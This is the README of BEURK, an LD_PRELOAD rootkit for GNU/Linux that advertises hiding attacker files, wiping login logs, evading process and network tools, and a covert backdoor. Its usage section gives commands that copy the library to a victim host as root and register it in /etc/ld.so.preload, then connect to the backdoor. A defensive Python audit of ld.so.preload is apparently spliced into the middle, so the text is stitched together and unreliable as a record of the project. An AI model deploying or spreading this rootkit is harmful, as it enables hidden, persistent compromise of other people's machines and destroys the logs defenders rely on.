BEURK

Getting Started | API Documentation | Contributing | TODO List

BEURK is a userland preload rootkit for GNU/Linux, heavily focused on anti-debugging and anti-detection.

If they knew, they would vomit ...

- The core team -


Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Evasion of process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage

  • Compile
    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
  • Install
    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy!
    ./client.py victim_ip:port # connect with furtive backdoor
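As an added defender-side example (not part of the BEURK project's code), here is a small audit of /etc/ld.so.preload, the file the install step above appends one line to: any entry the administrator did not deliberately approve is a finding. The trusted-directory list, the soname regex heuristic and the sample file contents are assumptions constructed for this example.

```python
import re

# Directories where a packaged runtime library normally lives (assumption
# for this example; adjust to the host's multiarch layout).
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Packaged runtime libraries are installed under a versioned soname,
# e.g. libfoo.so.1; a bare libfoo.so is a heuristic signal only.
VERSIONED_SO = re.compile(r"^lib[\w+-]+\.so(\.\d+)+$")


def parse_ld_so_preload(text):
    """Return the shared-object paths listed in ld.so.preload content.
    glibc reads the file as a whitespace-separated list of paths; '#'
    comments are dropped here as a convenience (assumption, not a loader
    guarantee). Obtain `text` with a statically linked tool or from an
    offline-mounted disk: a preload rootkit hooks libc in every
    dynamically linked process and can hide the file or its contents."""
    entries = []
    for line in text.splitlines():
        entries.extend(line.split("#", 1)[0].split())
    return entries


def audit_preload_entries(entries, baseline=frozenset()):
    """Return a list of (path, reasons) for every entry not in `baseline`.
    The install step in the README is exactly one line appended to this
    file, so any entry the administrator did not deliberately approve is a
    finding; the extra heuristics only rank how suspicious it looks."""
    findings = []
    for path in entries:
        if path in baseline:
            continue
        reasons = ["not in the approved preload baseline"]
        if not path.startswith("/"):
            reasons.append("relative path, resolved differently per process")
        elif not path.startswith(TRUSTED_LIB_DIRS):
            reasons.append("outside the standard library directories")
        if not VERSIONED_SO.match(path.rsplit("/", 1)[-1]):
            reasons.append("unversioned .so name, unlike a packaged runtime library")
        findings.append((path, reasons))
    return findings


# Constructed sample: the file as the README's install step leaves it, plus a
# placeholder entry for an agent the administrator deployed on purpose.
SAMPLE_PRELOAD = "/usr/lib/libmonitor-agent.so.1\n/lib/libselinux.so\n"
APPROVED = frozenset({"/usr/lib/libmonitor-agent.so.1"})
```

Run `audit_preload_entries(parse_ld_so_preload(SAMPLE_PRELOAD), APPROVED)` and the only finding is the appended entry, flagged both as unapproved and as an unversioned library name.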

Dependencies

The following packages are not currently required to build BEURK:

  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection

Example on Debian:

    apt-get install libpcap-dev libpam-dev libssl-dev

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit
